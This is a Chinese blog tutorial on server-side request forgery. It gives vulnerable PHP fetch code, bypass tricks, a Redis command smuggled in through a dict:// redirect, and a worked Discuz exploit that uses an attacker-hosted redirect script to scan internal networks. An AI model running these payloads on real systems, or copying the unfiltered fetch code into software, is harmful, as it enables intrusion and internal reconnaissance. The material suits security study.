SSRF

最新推荐文章于 2024-10-05 16:44:44 发布
最新推荐文章于 2024-10-05 16:44:44 发布
阅读量2.4k 收藏 1
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Le0nis/article/details/52127550
版权

SSRF

0x00 介绍

ssrf:
服务端请求伪造:是一种由攻击者构造形成由服务器端发起请求的一个安全漏洞
作用:
用来访问外部网络无法访问的内网系统

0x01 威胁

  • 扫描内部网络
  • 向内部任意主机的任意端口发送精心构造的数据包(payload)
  • DOS(请求大文件、始终保持keep-Alive Always)
  • 暴力穷举(users/dirs/files)

0x02 成因

服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制
比如从指定url地址获取网页文本内容、加载指定地址的图片,下载等

PHP相关函数

file_get_content()

<?php
if (isset($_POST['url'])) 
{ 
$content = file_get_contents($_POST['url']); 
$filename ='./images/'.rand().';img1.jpg'; 
file_put_contents($filename, $content); 
echo $_POST['url']; 
$img = "<img src=\"".$filename."\"/>"; 
} 
echo $img; 
?>

curl_exec() 

<?php 
if (isset($_POST['url']))
{
$link = $_POST['url'];
$curlobj = curl_init();
curl_setopt($curlobj, CURLOPT_POST, 0);
curl_setopt($curlobj,CURLOPT_URL,$link);
curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($curlobj);
curl_close($curlobj);

$filename = './curled/'.rand().'.txt';
file_put_contents($filename, $result); 
echo $result;
}
?>

fsockopen() 

<?php 
function GetFile($host,$port,$link) 
{ 
$fp = fsockopen($host, intval($port), $errno, $errstr, 30); 
if (!$fp) { 
echo "$errstr (error number $errno) \n"; 
} else { 
$out = "GET $link HTTP/1.1\r\n"; 
$out .= "Host: $host\r\n"; 
$out .= "Connection: Close\r\n\r\n"; 
$out .= "\r\n"; 
fwrite($fp, $out); 
$contents=''; 
while (!feof($fp)) { 
$contents.= fgets($fp, 1024); 
} 
fclose($fp); 
return $contents; 
} 
}
?>

0x03 利用限制(以下情况不能利用)

  • 服务器端开启openssl
  • 服务器需要信息验证(账号、密码、cookie)

0x04 利用方式

  • 对外网、服务器所在内网、本地进行端口扫描,获取一些banner信息
  • 攻击运行在内网或本地的应用程序
  • 对内网web应用进行指纹识别,通过访问默认文件
  • 攻击内外网的web应用,主要使用get参数
  • 使用file协议读取本地文件

0x05 寻找

1、从web功能上寻找

  • 能够对外发起网络请求的地方

  • 从远程服务器请求资源(upload from URL,import & Export RSS feed)

    • Upload from URL:
    • Discuz
    • Import & Export RSS feed:
    • web Blog
    • 使用了XML引擎的地方:
    • Wordpress xmlrpc.php

  • 数据库内置功能(Oracle,MongoDB,MSSQL,Postgres,CouchDB,Redis)

  • webmail 收取其它邮箱邮件

  • 文件处理,编码处理,属性信息处理

详情关注猪猪侠ppt

2、从url关键字中寻找 

share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domain

利用google hack

0x06 漏洞验证

基本判断(排除法)
查看发送数据包的情况,ssrf是由服务端发起的请求,如果存在ssrf漏洞 那么我们本地浏览器中将不存在对该图片的请求。

验证是否可以探测内网
找存在http服务的内网地址

  • 从漏洞平台中的历史漏洞寻找泄露的内网地址
  • 通过子域名暴力破解工具模糊猜测内网地址

0x07 过滤绕过

http://10.10.116.11 -> http://t.cn/RwbLKDx
  • 端口绕过 
http://tieba.baidu.com/f/commit/share/openShareApi?url=http://10.50.33.43:8080/
  • xip.io
url=http://www.10.10.10.10.xip.io
  • 通过跳转
<?php
Header("HTTP/1.1 301 Moved Permanently");
Header("Location: http://www.icoa.cn");
?>

Discuz! SSRF


/forum.php?mod=ajax&action=downremoteimg&message=[img]http://远程主机地址/302.php?helo.jpg[/img]

302.php


<?php 
header("Location: dict://10.0.0.1:6379/set:1:helo"); # set 1

0x08 实例演示

  • Discuz ssrf
    首先Discuz
    source/module/forum/forum_ajax.php文件
} elseif($_GET['action'] == 'downremoteimg') { $_GET['message'] = str_replace(array("\r", "\n"), array($_GET['wysiwyg'] ? '<br />' : '', "\\n"), $_GET['message']); preg_match_all("/\[img\]\s*([^\[\<\r\n]+?)\s*\[\/img\]|\[img=\d{1,4}[x|\,]\d{1,4}\]\s*([^\[\<\r\n]+?)\s*\[\/img\]/is", $_GET['message'], $image1, PREG_SET_ORDER); preg_match_all("/\<img.+src=('|\"|)?(.*)(\\1)([\s].*)?\>/ismUe", $_GET['message'], $image2, PREG_SET_ORDER); $temp = $aids = $existentimg = array(); if(is_array($image1) && !empty($image1)) { foreach($image1 as $value) { $temp[] = array( '0' => $value[0], '1' => trim(!empty($value[1]) ? $value[1] : $value[2]) ); } } if(is_array($image2) && !empty($image2)) { foreach($image2 as $value) { $temp[] = array( '0' => $value[0], '1' => trim($value[2]) ); } } require_once libfile('class/image'); if(is_array($temp) && !empty($temp)) { $upload = new discuz_upload(); $attachaids = array(); foreach($temp as $value) { $imageurl = $value[1]; $hash = md5($imageurl); if(strlen($imageurl)) { $imagereplace['oldimageurl'][] = $value[0]; if(!isset($existentimg[$hash])) { $existentimg[$hash] = $imageurl; $attach['ext'] = $upload->fileext($imageurl); if(!$upload->is_image_ext($attach['ext'])) { continue; } $content = ''; if(preg_match('/^(http:\/\/|\.)/i', $imageurl)) { $content = dfsockopen($imageurl); } elseif(preg_match('/^('.preg_quote(getglobal('setting/attachurl'), '/').')/i', $imageurl)) { $imagereplace['newimageurl'][] = $value[0]; }

content=dfsockopen( imageurl);
处,直接可以传入URL,造成SSRF

构造
通过构造一个远程的伪图片

172.16.77.145/discuz/upload/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://le0nis.xyz/1.php?xxx.jpg[/img]

1.php

<?php
Header("Location:http://172.16.77.145");
?>

我们让其301到一个内网ip的80端口,然后根据整个请求完成的时间不同来判定该服务是否存在,构造链接如下 

172.16.77.145/discuz/upload/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://le0nis.xyz/1.php?s=http&ip=172.16.77.147&port=80&data=helo.jpg[/img]

1.php接收我们的参数

<?php
Header("Location:".$_GET['s']."://".$_GET['ip'].":".$_GET['port']."/".$_GET['data']);
?>

这样就构成了一个探测内网的批量程序

我们可以写脚本处理

Le0nis
关注
专栏目录
乌云峰会猪猪侠ppt-关于SSRF
03-26
该资源是猪猪侠在2016年乌云峰会上发表演讲的PPT(已被转成PDF),内容是关于SSRF漏洞,我之前找这个找了很久,在这里分享出来,供大家参考学习,共同进步。
SSRF(通过时间判断) 点击保存头像,开启burpsuite抓包
10-07
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种常见的网络安全漏洞,它允许攻击者利用服务器的网络权限发起对外部资源的请求。在这个场景中,通过时间延迟的判断方法,攻击者能够探测内网中的某些...
XSPA / SSRF 利用脚本
收集盒 Book box
08-23 1597
#Author: Riyaz Ahemed Walikar import sys import requests import time useragent = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2'} def portscan(port):
Pikachu-SSRF(curl / file_get_content)
最新发布
guanrongl的专栏
10-05 565
SSRF是Server-side Request Forge的缩写,中文翻译为服务端请求伪造。产生的原因是由于服务端提供了从其他服务器应用获取数据的功能且没有对地址和协议等做过滤和限制。常见的一个场景就是,通过用户输入的URL来获取图片。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。从后端代码可以看出,没做过滤,只是判断url是否为空;对此,可以通过ssrf,对同一内外的其他服务器进行探测;数据流:攻击者----->服务器---->目标地址。
ssrf
h3110n3w0r1d
04-05 299
SSRF形成的原因是服务端提供了从其他服务器应用获取数据的功能,在用户可控的情况下,未对目标地址进行过滤与限制,导致此漏洞的产生。 利用函数file_get_concents();fopen()和fpassthru();curl_exec();fsocksopen(); 1.php <?php $a=$_GET['a']; echo file_get_contents($a); ?&...
SSRF一—WEB攻防-SSRF服务端请求&Gopher伪协议&无回显利用&黑白盒挖掘&业务功能点
zyw268的博客
03-25 391
黑盒WEB-业务功能&URL关键字。SSRF-原理&挖掘&利用&修复。白盒CTF-绕过&伪协议&审计点。
SSRF最全总结(协议,绕过)
热门推荐
weixin_50464560的博客
01-13 1万+
https://www.anquanke.com/post/id/262430#h3-46   SSRF-Labs配置 有些初学者喜欢用这个靶场,讲下怎么搭建 我用的是Ubuntu18;docker和docker-compose配置可以参考vulhub官网的配置;下面是谷歌搜的 $ curl -sSL https://get.docker.com/ | sh #脚本安装docker $ apt install docker-compose #安装docker compose Basic关和
SSRF(Server Side Request Forgery,SSRF)漏洞.pdf
07-05
服务端请求伪造(SSRF)漏洞是一种攻击者利用服务器应用程序的漏洞,向服务器发送虚假请求的一种技术。这种攻击可以让攻击者操纵服务器应用程序,使得服务器向攻击者指定的任意资源发起请求。攻击者通常通过 SSRF ...
国光师傅的SSRF靶场docker环境.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。...
ssrf-req-filter:在 NodeJS 中发送请求时防止 SSRF 的模块。 阻止对本地和私有 IP 地址的请求
05-31
ssrf-req-filter - 防止 SSRF 攻击 :shield: 服务器端请求伪造 (SSRF) SSRF 是一种攻击媒介,它滥用应用程序与内部/外部网络或机器本身进行交互。 此向量的促成因素之一是 URL 处理不当。 安装 npm install ssrf-...
SSRF服务器跨站脚本漏洞
Bulldozer_GD的博客
11-01 221
SSRF漏洞原理 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由恶意访问者构造形成由服务端发起请求的一个安全漏洞一般情况下,SSRF访问的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。 SSRF漏洞原理图解 SSRF漏洞原因与利用方式 服务器提供从其他服务器获取数据的功能,且没有对目标地址做出过滤和
csrf-ssrf
jinhezhai的博客
10-12 1557
title: csrf,ssrf小结 date: 2021-03-17 20:17:40 csrf,ssrf小结 csrf和ssrf的区别 csrf 概念 CSRF跨站点请求伪造(Cross—Site Request Forgery),跟XSS攻击一样,存在巨大的危害性。你可以这样来理解: 攻击者盗用了你的身份,以你的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,添加系统管理员,甚至于购买商品、.
【ctfhub-ssrf】伪协议读取文件
weixin_52116519的博客
04-28 1455
题目 根据题目提示,需要我们读取服务器的web目录的flag.php文件。web目录一般在/var/www/html。 file:// 协议 中文释义:本地文件传输协议 注解:File协议主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件一样。 应用:要使用File协议,基本的格式如下:file:///文件路径 比如要打开F盘flash文件夹中的1.swf文件,那么可以在资源管理器或IE地址栏中键入:file:///f:/flash/1.swf并回车。 解题 ...
Discuz+ssrf验证方式
weixin_41438728的博客
11-12 1571
Discuz+ssrf验证方式 记某汽车网站的ssrf验证过程,发现该网站使用的是Discuz3.0。 原理 SSRF(Server-Side Request Forgery),服务器端请求伪造,利用漏洞伪造服务器端发起请求,从而突破客户端获取不到数据限制。 那么SSRF 可以做什么呢? 1.内外网的端口和服务扫描 2.主机本地敏感数据的读取 3.内外网主机应用程序漏洞的利用 4.内外网Web站点漏洞的利用 利用exp: http://localhost/discuz/forum.php?mod=ajax&
【漏洞学习——SSRF】腾讯某处SSRF漏洞(非常好的利用点)附利用脚本
Fly_鹏程万里
02-22 7576
漏洞细节 ## 1. 描述 本文章将概述一些经典的SSRF漏洞利用原理,从Fuzz扫描开放的服务到漏洞的自动化利用,刚好腾讯的这个漏洞点,非常适合做为案例来演示。### 1.1 漏洞信息 &gt; 腾讯微博应用  &gt; http://share.v.t.qq.com &gt; SSRF利用点,参数: url &gt; http://share.v.t.qq.com/index.php?c=s...
SSRF 302跳转 gopher协议攻击redis写入ssh公钥,实现远程无密登录(学习总结)
L2329794714的博客
11-20 3265
一、SSRF漏洞 SSRF(Server Side Request Forgery,服务器端请求伪造)是一种攻击者通过构造数据进而伪造服务器端发起请求的漏洞,因为求情是由服务器发出的,所以往往是利用SSRF漏洞攻击服务器所在网络内部系统。 SSRF漏洞形成原因是服务器提供了从外部获取数据的功能,但没有对获取数据的目标地址、协议等进行过滤和限制,从而攻击者可以让服务器发起任意请求。 如下是一个简单的SSRF漏洞,对传入的url 没有做任何限制。即可通过向...
SSRF 漏洞的寻找
WHACKW的专栏
01-04 5541
SSRF 漏洞的寻找 一、从WEB功能上寻找 我们从上面的概述可以看出,SSRF是由于服务端获取其他服务器的相关信息的功能中形成的,因此我们大可以列举几种在web 应用中常见的从服务端获取其他服务器信息的的功能。 1)分享:通过URL地址分享网页内容 早期分享应用中,为了更好的提供用户体验,WEB应用在分享功能中,通常会获取目标URL地址网页内容中的标签或者标签中content的文本内容作
CTFHub技能树web(持续更新)--SSRF--伪协议读取文件
jiuyongpinyin的博客
01-27 2386
伪协议读取文件 这里我们先来了解一下SSRF中的URL的伪协议: file:/// dict:/// sftp:// ldap:// tftp:// gopher:// 然后通过题目给我们的提示,我们读取web目录下的文件,一般网站的目录都放在www/html/目录下,其实如果看过我之前的结题,在文件上传的题目里,我们使用蚁剑连接后就能够看到目录,所以我们直接构造url: ?url=file:///var/www/html/flag.php 发现只有三个问号,这里需要查看一下网页源代码,当然也可以只
【漏洞复现系列】Apache Solr SSRF文件读取漏洞(附0day POC)
qq_41703976的博客
03-19 1750
漏洞详情 Apache Solr <= 8.8.1均受影响,通杀所有版本,官方拒绝修复 通过Solr提供的API可以开启远程开启文件流读取: curl -d '{ "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}' http://xx.xx.xx.xx:8984/solr/corename/config -H 'Content-type:application/json' 再传入文件
ssrf redis
08-29
SSRF (Server Side Request Forgery) 是一种攻击方式,通过欺骗服务器发起伪造的请求来访问受信任的内部资源。Redis 是一种流行的开源内存数据库。 如果你想通过 SSRF 进行 Redis 的攻击,可能的方式包括: 1. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值